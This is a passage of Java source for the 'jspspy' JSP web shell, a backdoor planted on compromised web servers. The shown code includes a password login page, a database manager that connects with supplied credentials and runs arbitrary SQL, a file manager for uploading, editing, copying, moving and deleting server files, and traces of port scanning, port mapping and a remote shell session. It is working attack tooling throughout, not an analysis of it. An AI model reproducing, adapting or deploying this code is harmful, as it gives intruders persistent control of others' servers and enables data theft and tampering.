1007rs.put(port,"Open");
1008}
1009s.close();
1010} catch (Exception e) {
1011if (e.toString().toLowerCase().indexOf("read timed out")!=-1) {
1012rs.put(port,"Open <span style=\"color:grey;font-weight:normal\"><<No Banner!>></span>");
1013if (r != null)
1014r.close();
1015} else {
1016rs.put(port,"Close");
1017}
1018}
1019}
1020out.println("<div style='margin:10px'>");
1021Set entrySet = rs.entrySet();
1022Iterator it = entrySet.iterator();
1023while (it.hasNext()) {
1024Map.Entry e = (Map.Entry)it.next();
1025String port = (String)e.getKey();
1026String value = (String)e.getValue();
1027out.println(ip+" : "+port+" ................................. <font color="+(value.equals("Close")?"red":"green")+"><b>"+value+"</b></font><br>");
1028}
1029out.println("</div>");
1030} catch (Exception e) {
1031
1032throw e ;
1033}
1034}
1035}
1036private static class VConnInvoker extends DefaultInvoker {
1037public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1038try {
1039PrintWriter out = response.getWriter();
1040Object obj = JSession.getAttribute(DBO);
1041if (obj == null || !((DBOperator)obj).isValid()) {
1042out.println(" <script type=\"text/javascript\">"+
1043" function changeurldriver(){"+
1044" var form = document.forms[\"form1\"];"+
1045" var v = form.elements[\"db\"].value;"+
1046" form.elements[\"url\"].value = v.split(\"`\")[1];"+
1047" form.elements[\"driver\"].value = v.split(\"`\")[0];"+
1048" form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"+
1049" }"+
1050" </script>");
1051out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
1052"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
1053"<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\"0\">"+
1054"<h2>DataBase Manager »</h2>"+
1055"<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"+
1056"<p>"+
1057"Driver:"+
1058" <input class=\"input\" name=\"driver\" id=\"driver\" type=\"text\" size=\"35\" />"+
1059"URL:"+
1060"<input class=\"input\" name=\"url\" id=\"url\" value=\"\" type=\"text\" size=\"90\" />"+
1061"UID:"+
1062"<input class=\"input\" name=\"uid\" id=\"uid\" value=\"\" type=\"text\" size=\"10\" />"+
1063"PWD:"+
1064"<input class=\"input\" name=\"pwd\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\" />"+
1065"DataBase:"+
1066" <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"+
1067" <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"+
1068" <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"+
1069" <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"+
1070" <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\\ninty.mdb'>Access</option>"+
1071" <option value=' ` '>Other</option>"+
1072" </select>"+
1073"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\" />"+
1074"</p>"+
1075"</form></table><script>changeurldriver()</script>");
1076} else {
1077((Invoker)ins.get("dbc")).invoke(request,response,JSession);
1078}
1079} catch (ClassCastException e) {
1080throw e;
1081} catch (Exception e) {
1082
1083throw e ;
1084}
1085}
1086}
1087//DBConnect
1088private static class DbcInvoker extends DefaultInvoker {
1089public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1090try {
1091PrintWriter out = response.getWriter();
1092String driver = request.getParameter("driver");
1093String url = request.getParameter("url");
1094String uid = request.getParameter("uid");
1095String pwd = request.getParameter("pwd");
1096String sql = request.getParameter("sql");
1097String selectDb = request.getParameter("selectDb");
1098if (selectDb == null)
1099selectDb = JSession.getAttribute("selectDb").toString();
1100else
1101JSession.setAttribute("selectDb",selectDb);
1102Object dbo = JSession.getAttribute(DBO);
1103if (dbo == null || !((DBOperator)dbo).isValid()) {
1104if (dbo != null)
1105((DBOperator)dbo).close();
1106dbo = new DBOperator(driver,url,uid,pwd,true);
1107} else {
1108if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) {
1109DBOperator oldDbo = (DBOperator)dbo;
1110dbo = new DBOperator(driver,url,uid,pwd);
1111if (!oldDbo.equals(dbo)) {
1112((DBOperator)oldDbo).close();
1113((DBOperator)dbo).connect();
1114} else {
1115dbo = oldDbo;
1116}
1117}
1118}
1119DBOperator Ddbo = (DBOperator)dbo;
1120JSession.setAttribute(DBO,Ddbo);
1121if (!Util.isEmpty(request.getParameter("type")) && request.getParameter("type").equals("switch")) {
1122Ddbo.getConn().setCatalog(request.getParameter("catalog"));
1123}
1124Util.outMsg(out,"Connect To DataBase Success!");
1125out.println(" <script type=\"text/javascript\">"+
1126" function changeurldriver(selectDb){"+
1127" var form = document.forms[\"form1\"];"+
1128" if (selectDb){"+
1129" form.elements[\"db\"].selectedIndex = selectDb"+
1130" }"+
1131" var v = form.elements[\"db\"].value;"+
1132" form.elements[\"url\"].value = v.split(\"`\")[1];"+
1133" form.elements[\"driver\"].value = v.split(\"`\")[0];"+
1134" form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"+
1135" }"+
1136" </script>");
1137out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
1138"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
1139"<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\""+selectDb+"\">"+
1140"<h2>DataBase Manager »</h2>"+
1141"<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"+
1142"<p>"+
1143"Driver:"+
1144" <input class=\"input\" name=\"driver\" value=\""+Ddbo.driver+"\" id=\"driver\" type=\"text\" size=\"35\" />"+
1145"URL:"+
1146"<input class=\"input\" name=\"url\" value=\""+Ddbo.url+"\" id=\"url\" value=\"\" type=\"text\" size=\"90\" />"+
1147"UID:"+
1148"<input class=\"input\" name=\"uid\" value=\""+Ddbo.uid+"\" id=\"uid\" value=\"\" type=\"text\" size=\"10\" />"+
1149"PWD:"+
1150"<input class=\"input\" name=\"pwd\" value=\""+Ddbo.pwd+"\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\" />"+
1151"DataBase:"+
1152" <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"+
1153" <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"+
1154" <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"+
1155" <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"+
1156" <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:/ninty.mdb'>Access</option>"+
1157" <option value=' ` '>Other</option>"+
1158" </select>"+
1159"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\" />"+
1160"</p>"+
1161"</form><script>changeurldriver('"+selectDb+"')</script>");
1162DatabaseMetaData meta = Ddbo.getConn().getMetaData();
1163out.println("<form action=\""+SHELL_NAME+"\" method=\"POST\">"+
1164"<p><input type=\"hidden\" name=\"selectDb\" value=\""+selectDb+"\"><input type=\"hidden\" name=\"o\" value=\"executesql\"><table width=\"200\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td colspan=\"2\">Version : <b style='color:red;font-size:14px'><i>"+meta.getDatabaseProductName()+" , "+meta.getDatabaseProductVersion()+"</i></b><br/>URL : <b style='color:red;font-size:14px'><i>"+meta.getURL()+"</i></b><br/>Catalog : <b style='color:red;font-size:14px'><i>"+Ddbo.getConn().getCatalog()+"</i></b><br/>UserName : <b style='color:red;font-size:14px'><i>"+meta.getUserName()+"</i></b><br/><br/></td></tr><tr><td colspan=\"2\">Run SQL query/queries on database / <b><i>Switch Database :</i></b> ");
1165out.println("<select id=\"catalogs\" onchange=\"if (this.value == '0') return;doPost({o:'executesql',type:'switch',catalog:document.getElementById('catalogs').value})\">");
1166out.println("<option value='0'>-- Select a DataBase --</option>");
1167ResultSet dbs = meta.getCatalogs();
1168try {
1169while (dbs.next()){
1170out.println("<option value='"+dbs.getString(1)+"'>"+dbs.getString(1)+"</option>");
1171}
1172}catch(Exception ex) {
1173}
1174dbs.close();
1175out.println("</select></td></tr><tr><td><textarea id=\"sql\" name=\"sql\" class=\"area\" style=\"width:600px;height:50px;overflow:auto;\">"+Util.htmlEncode(Util.getStr(sql))+"</textarea><input class=\"bt\" name=\"submit\" type=\"submit\" value=\"Query\" /> <input class=\"bt\" onclick=\"doPost({o:'export',type:'queryexp',sql:document.getElementById('sql').value})\" type=\"button\" value=\"Export\" /> <input type='button' value='Export To File' class='bt' onclick=\"doPost({o:'vExport',type:'queryexp',sql:document.getElementById('sql').value})\"></td><td nowrap style=\"padding:0 5px;\"></td></tr></table></p></form></table>");
1176if (Util.isEmpty(sql)) {
1177String type = request.getParameter("type");
1178if (Util.isEmpty(type) || type.equals("switch")) {
1179ResultSet tbs = meta.getTables(null,null,null,null);
1180out.println(Table.rs2Table(tbs,meta.getIdentifierQuoteString(),true));
1181tbs.close();
1182} else if (type.equals("struct")) {
1183String tb = request.getParameter("table");
1184if (Util.isEmpty(tb))
1185return;
1186ResultSet t = meta.getColumns(null,null,tb,null);
1187out.println(Table.rs2Table(t,"",false));
1188t.close();
1189}
1190}
1191} catch (Exception e) {
1192JSession.setAttribute(MSG,"<span style='color:red'>Some Error Occurred. Please Check Out the StackTrace Follow.</span>"+BACK_HREF);
1193throw e;
1194}
1195}
1196}
1197private static class ExecuteSQLInvoker extends DefaultInvoker{
1198public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1199try {
1200PrintWriter out = response.getWriter();
1201String sql = request.getParameter("sql");
1202String db = request.getParameter("selectDb");
1203Object dbo = JSession.getAttribute(DBO);
1204if (!Util.isEmpty(sql)) {
1205if (dbo == null || !((DBOperator)dbo).isValid()) {
1206((Invoker)ins.get("vConn")).invoke(request,response,JSession);
1207return;
1208} else {
1209((Invoker)ins.get("dbc")).invoke(request,response,JSession);
1210Object obj = ((DBOperator)dbo).execute(sql);
1211if (obj instanceof ResultSet) {
1212ResultSet rs = (ResultSet)obj;
1213ResultSetMetaData meta = rs.getMetaData();
1214int colCount = meta.getColumnCount();
1215out.println("<b style=\"margin-left:15px\">Query#0 : "+Util.htmlEncode(sql)+"</b><br/><br/>");
1216out.println("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\" style=\"margin-left:15px\"><tr class=\"head\">");
1217for (int i=1;i<=colCount;i++) {
1218out.println("<td nowrap>"+meta.getColumnName(i)+"<br><span>"+meta.getColumnTypeName(i)+"</span></td>");
1219}
1220out.println("</tr>");
1221Table tb = new Table();
1222while(rs.next()) {
1223Row r = new Row();
1224for (int i = 1;i<=colCount;i++) {
1225String v = null;
1226try {
1227v = rs.getString(i);
1228} catch (SQLException ex) {
1229v = "<<Error!>>";
1230}
1231r.addColumn(new Column(v));
1232}
1233tb.addRow(r);
1234}
1235out.println(tb.toString());
1236out.println("</table><br/>");
1237rs.close();
1238((DBOperator)dbo).closeStmt();
1239} else {
1240out.println("<b style='margin-left:15px'>affected rows : <i>"+obj+"</i></b><br/><br/>");
1241}
1242}
1243} else {
1244((Invoker)ins.get("dbc")).invoke(request,response,JSession);
1245}
1246} catch (Exception e) {
1247
1248throw e ;
1249}
1250}
1251}
1252private static class VLoginInvoker extends DefaultInvoker {
1253public boolean doBefore() {return false;}
1254public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1255try {
1256PrintWriter out = response.getWriter();
1257out.println("<html><head><title>jspspy</title><style type=\"text/css\">"+
1258" input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}"+
1259"a{font:11px Verdana;BACKGROUND: #FFFFFF;}"+
1260" </style></head><body><form method=\"POST\" action=\""+SHELL_NAME+"\">"+
1261"<!--<p style=\"font:11px Verdana;color:red\">Private Edition Dont Share It !</p>-->"+
1262" <p><span style=\"font:11px Verdana;\">Password: </span>"+
1263" <input name=\"o\" type=\"hidden\" value=\"login\">"+
1264" <input name=\"pw\" type=\"password\" size=\"20\">"+
1265" <input type=\"hidden\" name=\"o\" value=\"login\">"+
1266" <input type=\"submit\" value=\"Login\"><br/>"+
1267"<!--<span style=\"font:11px Verdana;\">Copyright © 2010 NinTy </span><a href=\"http://www.forjj.com\" target=\"_blank\">www.Forjj.com</a>--></p>"+
1268" </form><span style='font-weight:bold;color:red;font-size:12px'>CY... I Love You. I Do! by n1nty 2010/8/18</span></body></html>");
1269} catch (Exception e) {
1270
1271throw e ;
1272}
1273}
1274}
1275private static class LoginInvoker extends DefaultInvoker{
1276public boolean doBefore() {return false;}
1277public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1278try {
1279String inputPw = request.getParameter("pw");
1280if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) {
1281((Invoker)ins.get("vLogin")).invoke(request,response,JSession);
1282return;
1283} else {
1284JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw);
1285response.sendRedirect(SHELL_NAME);
1286return;
1287}
1288} catch (Exception e) {
1289
1290throw e ;
1291}
1292}
1293}
1294private static class MyComparator implements Comparator{
1295public int compare(Object obj1,Object obj2) {
1296try {
1297if (obj1 != null && obj2 != null) {
1298File f1 = (File)obj1;
1299File f2 = (File)obj2;
1300if (f1.isDirectory()) {
1301if (f2.isDirectory()) {
1302return f1.getName().compareTo(f2.getName());
1303} else {
1304return -1;
1305}
1306} else {
1307if (f2.isDirectory()) {
1308return 1;
1309} else {
1310return f1.getName().toLowerCase().compareTo(f2.getName().toLowerCase());
1311}
1312}
1313}
1314return 0;
1315} catch (Exception e) {
1316return 0;
1317}
1318}
1319}
1320private static class FileListInvoker extends DefaultInvoker {
1321public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
1322try {
1323String path2View = null;
1324PrintWriter out = response.getWriter();
1325String path = request.getParameter("folder");
1326String outEntry = request.getParameter("outentry");
1327if (!Util.isEmpty(outEntry) && outEntry.equals("true")) {
1328JSession.removeAttribute(ENTER);
1329JSession.removeAttribute(ENTER_MSG);
1330JSession.removeAttribute(ENTER_CURRENT_DIR);
1331}
1332Object enter = JSession.getAttribute(ENTER);
1333File file = null;
1334if (!Util.isEmpty(enter)) {
1335if (Util.isEmpty(path)) {
1336if (JSession.getAttribute(ENTER_CURRENT_DIR) == null)
1337path = "/";
1338else
1339path = (String)(JSession.getAttribute(ENTER_CURRENT_DIR));
1340}
1341file = new EnterFile(path);
1342((EnterFile)file).setZf((String)enter);
1343JSession.setAttribute(ENTER_CURRENT_DIR,path);
1344} else {
1345if (Util.isEmpty(path))
1346path = JSession.getAttribute(CURRENT_DIR).toString();
1347JSession.setAttribute(CURRENT_DIR,Util.convertPath(path));
1348file = new File(path);
1349}
1350path2View = Util.convertPath(path);
1351if (!file.exists()) {
1352throw new Exception(path+"Dont Exists !");
1353}
1354File[] list = file.listFiles();
1355Arrays.sort(list,new MyComparator());
1356out.println("<div style='margin:10px'>");
1357String cr = null;
1358try {
1359cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3);
1360}catch(Exception e) {
1361cr = "/";
1362}
1363File currentRoot = new File(cr);
1364out.println("<h2>File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)</h2>");
1365out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
1366"<table width=\"98%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
1367" <tr>"+
1368" <td nowrap>Current Directory <input type=\"hidden\" name=\"o\" value=\"filelist\"/></td>"+
1369" <td width=\"98%\"><input class=\"input\" name=\"folder\" value=\""+path2View+"\" type=\"text\" style=\"width:100%;margin:0 8px;\"></td>"+
1370" <td nowrap><input class=\"bt\" value=\"GO\" type=\"submit\"></td>"+
1371" </tr>"+
1372"</table>"+
1373"</form>");
1374out.println("<table width=\"98%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\">"+
1375"<form action=\""+SHELL_NAME+"?o=upload\" method=\"POST\" enctype=\"multipart/form-data\"><tr class=\"alt1\"><td colspan=\"7\" style=\"padding:5px;\">"+
1376"<div style=\"float:right;\"><input class=\"input\" name=\"file\" value=\"\" type=\"file\" /> <input class=\"bt\" name=\"doupfile\" value=\"Upload\" "+(enter == null ?"type=\"submit\"":"type=\"button\" onclick=\"alert('You Are In File Now ! Can Not Upload !')\"")+" /></div>"+
1377"<a href=\"javascript:new fso({path:'"+Util.convertPath(WEB_ROOT)+"'}).subdir('true')\">Web Root</a>"+
1378" | <a href=\"javascript:new fso({path:'"+Util.convertPath(SHELL_DIR)+"'}).subdir('true')\">Shell Directory</a>"+
1379" | <a href=\"javascript:"+(enter == null ? "new fso({}).mkdir()" : "alert('You Are In File Now ! Can Not Create Directory ! ')")+"\">New Directory</a> | <a href=\"javascript:"+(enter == null ? "new fso({}).createFile()" : "alert('You Are In File Now ! Can Not Create File !')")+"\">New File</a>"+
1380" | ");
1381File[] roots = file.listRoots();
1382for (int i = 0;i<roots.length;i++) {
1383File r = roots[i];
1384out.println("<a href=\"javascript:new fso({path:'"+Util.convertPath(r.getPath())+"'}).subdir('true');\">Disk("+Util.convertPath(r.getPath())+")</a>");
1385if (i != roots.length -1) {
1386out.println("|");
1387}
1388}
1389out.println("</td>"+
1390"</tr></form>"+
1391"<tr class=\"head\"><td> </td>"+
1392" <td>Name</td>"+
1393" <td width=\"16%\">Last Modified</td>"+
1394" <td width=\"10%\">Size</td>"+
1395" <td width=\"20%\">Read/Write/Execute</td>"+
1396" <td width=\"22%\"> </td>"+
1397"</tr>");
1398if (file.getParent() != null) {
1399out.println("<tr class=alt1>"+
1400"<td align=\"center\"><font face=\"Wingdings 3\" size=4>=</font></td>"+
1401"<td nowrap colspan=\"5\"><a href=\"javascript:new fso({path:'"+Util.convertPath(file.getAbsolutePath())+"'}).parent()\">Goto Parent</a></td>"+
1402"</tr>");
1403}
1404int dircount = 0;
1405int filecount = 0;
1406for (int i = 0;i<list.length;i++) {
1407File f = list[i];
1408if (f.isDirectory()) {
1409dircount ++;
1410out.println("<tr class=\"alt2\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt2';\">"+
1411"<td width=\"2%\" nowrap><font face=\"wingdings\" size=\"3\">0</font></td>"+
1412"<td><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).subdir()\">"+f.getName()+"</a></td>"+
1413"<td nowrap>"+Util.formatDate(f.lastModified())+"</td>"+
1414"<td nowrap>--</td>"+
1415"<td nowrap>"+f.canRead()+" / "+f.canWrite()+" / unknow</td>"+
1416"<td nowrap>");
1417if (enter != null)
1418out.println(" ");
1419else
1420out.println("<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).removedir()\">Del</a> | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).move()\">Move</a> | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).pack(true)\">Pack</a>");
1421out.println("</td></tr>");
1422} else {
1423filecount++;
1424out.println("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">"+
1425"<td width=\"2%\" nowrap><input type='checkbox' value='"+f.getName()+"'/></td>"+
1426"<td><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).down()\">"+f.getName()+"</a></td>"+
1427"<td nowrap>"+Util.formatDate(f.lastModified())+"</td>"+
1428"<td nowrap>"+Util.getSize(f.length(),'B')+"</td>"+
1429"<td nowrap>"+
1430""+f.canRead()+" / "+f.canWrite()+" / unknow </td>"+
1431"<td nowrap>"+
1432"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).vEdit()\">Edit</a> | "+
1433"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).down()\">Down</a> | "+
1434"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).copy()\">Copy</a>");
1435if (enter == null ) {
1436out.println(" | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).move()\">Move</a> | "+
1437"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).vEditProperty()\">Property</a> | "+
1438"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).enter()\">Enter</a>");
1439if (f.getName().endsWith(".zip") || f.getName().endsWith(".jar")) {
1440out.println(" | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).unpack()\">UnPack</a>");
1441} else if (f.getName().endsWith(".rar")) {
1442out.println(" | <a href=\"javascript:alert('Dont Support RAR,Please Use WINRAR');\">UnPack</a>");
1443} else {
1444out.println(" | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).pack()\">Pack</a>");
1445}
1446}
1447out.println("</td></tr>");
1448}
1449}
1450out.println("<tr class=\"alt2\"><td align=\"center\"> </td>"+
1451" <td>");
1452if (enter != null)
1453out.println("<a href=\"javascript:alert('You Are In File Now ! Can Not Pack !');\">Pack Selected</a> - <a href=\"javascript:alert('You Are In File Now ! Can Not Delete !');\">Delete Selected</a>");
1454else
1455out.println("<a href=\"javascript:new fso({}).packBatch();\">Pack Selected</a> - <a href=\"javascript:new fso({}).deleteBatch();\">Delete Selected</a>");
1456out.println("</td>"+
1457" <td colspan=\"4\" align=\"right\">"+dircount+" directories / "+filecount+" files</td></tr>"+
1458"</table>");
1459out.println("</div>");
1460if (file instanceof EnterFile)
1461((EnterFile)file).close();
1462} catch (ZipException e) {
1463JSession.setAttribute(MSG,"\""+JSession.getAttribute(ENTER).toString()+"\" Is Not a Zip File. Please Exit.");
1464throw e;
1465} catch (Exception e) {
1466JSession.setAttribute(MSG,"File Does Not Exist Or You Dont Have Privilege."+BACK_HREF);
1467throw e;
1468}
1469}
1470}
1471private static class LogoutInvoker extends DefaultInvoker {
1472public boolean doBefore() {return false;}
1473public boolean doAfter() {return false;}
1474public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1475try {
1476Object dbo = JSession.getAttribute(DBO);
1477if (dbo != null)
1478((DBOperator)dbo).close();
1479Object obj = JSession.getAttribute(PORT_MAP);
1480if (obj != null) {
1481ServerSocket s = (ServerSocket)obj;
1482s.close();
1483}
1484Object online = JSession.getAttribute(SHELL_ONLINE);
1485if (online != null)
1486((OnLineProcess)online).stop();
1487JSession.invalidate();
1488((Invoker)ins.get("vLogin")).invoke(request,response,JSession);
1489} catch (ClassCastException e) {
1490JSession.invalidate();
1491((Invoker)ins.get("vLogin")).invoke(request,response,JSession);
1492} catch (Exception e) {
1493
1494throw e ;
1495}
1496}
1497}
1498private static class UploadInvoker extends DefaultInvoker {
1499public boolean doBefore() {return false;}
1500public boolean doAfter() {return false;}
1501public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1502try {
1503UploadBean fileBean = new UploadBean();
1504response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString());
1505fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString());
1506fileBean.parseRequest(request);
1507File f = new File(JSession.getAttribute(CURRENT_DIR)+"/"+fileBean.getFileName());
1508if (f.exists() && f.length() > 0)
1509JSession.setAttribute(MSG,"<span style='color:green'>Upload File Success!</span>");
1510else
1511JSession.setAttribute("MSG","<span style='color:red'>Upload File Failed!</span>");
1512response.sendRedirect(SHELL_NAME);
1513} catch (Exception e) {
1514throw e ;
1515}
1516}
1517}
1518private static class CopyInvoker extends DefaultInvoker {
1519public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1520try {
1521String src = request.getParameter("src");
1522String to = request.getParameter("to");
1523InputStream in = null;
1524Object enter = JSession.getAttribute(ENTER);
1525if (enter == null)
1526in = new FileInputStream(new File(src));
1527else {
1528ZipFile zf = new ZipFile((String)enter);
1529ZipEntry entry = zf.getEntry(src);
1530in = zf.getInputStream(entry);
1531}
1532BufferedInputStream input = new BufferedInputStream(in);
1533BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to)));
1534byte[] d = new byte[1024];
1535int len = input.read(d);
1536while(len != -1) {
1537output.write(d,0,len);
1538len = input.read(d);
1539}
1540output.close();
1541input.close();
1542JSession.setAttribute(MSG,"Copy File Success!");
1543response.sendRedirect(SHELL_NAME);
1544} catch (Exception e) {
1545
1546throw e ;
1547}
1548}
1549}
1550private static class BottomInvoker extends DefaultInvoker {
1551public boolean doBefore() {return false;}
1552public boolean doAfter() {return false;}
1553public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1554try {
1555response.getWriter().println("<div style=\"padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;\">Copyright (C) 2010 <a href=\"http://www.forjj.com\" target=\"_blank\">http://www.Forjj.com/</a> <a target=\"_blank\" href=\"http://www.t00ls.net/\">[T00ls.Net]</a> All Rights Reserved."+
1556"</div>");
1557} catch (Exception e) {
1558
1559throw e ;
1560}
1561}
1562}
1563private static class VCreateFileInvoker extends DefaultInvoker {
1564public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1565try {
1566PrintWriter out = response.getWriter();
1567String path = request.getParameter("filepath");
1568File f = new File(path);
1569if (!f.isAbsolute()) {
1570String oldPath = path;
1571path = JSession.getAttribute(CURRENT_DIR).toString();
1572if (!path.endsWith("/"))
1573path+="/";
1574path+=oldPath;
1575f = new File(path);
1576f.createNewFile();
1577} else {
1578f.createNewFile();
1579}
1580out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
1581"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
1582"<h2>Create / Edit File »</h2>"+
1583"<input type='hidden' name='o' value='createFile'>"+
1584"<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""+path+"\" type=\"text\" size=\"100\" />"+
1585" <select name='charset' class='input'><option value='ANSI'>ANSI</option><option value='UTF-8'>UTF-8</option></select></p>"+
1586"<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" ></textarea></p>"+
1587"<p><input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"+
1588"</form>"+
1589"</td></tr></table>");
1590} catch (Exception e) {
1591
1592throw e ;
1593}
1594}
1595}
1596private static class VEditInvoker extends DefaultInvoker {
1597public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1598try {
1599PrintWriter out = response.getWriter();
1600String path = request.getParameter("filepath");
1601String charset = request.getParameter("charset");
1602Object enter = JSession.getAttribute(ENTER);
1603InputStream input = null;
1604if (enter != null) {
1605ZipFile zf = new ZipFile((String)enter);
1606ZipEntry entry = new ZipEntry(path);
1607input = zf.getInputStream(entry);
1608} else {
1609File f = new File(path);
1610if (!f.exists())
1611return;
1612input = new FileInputStream(path);
1613}
1614
1615BufferedReader reader = null;
1616if (Util.isEmpty(charset) || charset.equals("ANSI"))
1617reader = new BufferedReader(new InputStreamReader(input));
1618else
1619reader = new BufferedReader(new InputStreamReader(input,charset));
1620StringBuffer content = new StringBuffer();
1621String s = reader.readLine();
1622while (s != null) {
1623content.append(s+"\r\n");
1624s = reader.readLine();
1625}
1626reader.close();
1627out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
1628"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
1629"<h2>Create / Edit File »</h2>"+
1630"<input type='hidden' name='o' value='createFile'>"+
1631"<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""+path+"\" type=\"text\" size=\"100\" />"+
1632" <select name='charset' id='fcharset' onchange=\"new fso({path:'"+path+"',charset:document.getElementById('fcharset').value}).vEdit()\" class='input'><option value='ANSI'>ANSI</option><option "+((!Util.isEmpty(charset) && charset.equals("UTF-8")) ? "selected" : "")+" value='UTF-8'>UTF-8</option></select></p>"+
1633"<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" >"+Util.htmlEncode(content.toString())+"</textarea></p>"+
1634"<p>");
1635if (enter != null)
1636out.println("<input class=\"bt\" name=\"submit\" id=\"submit\" onclick=\"alert('You Are In File Now ! Can Not Save !')\" type=\"button\" value=\"Submit\">");
1637else
1638out.println("<input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\">");
1639out.println("<input class=\"bt\" type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"+
1640"</form>"+
1641"</td></tr></table>");
1642
1643} catch (Exception e) {
1644
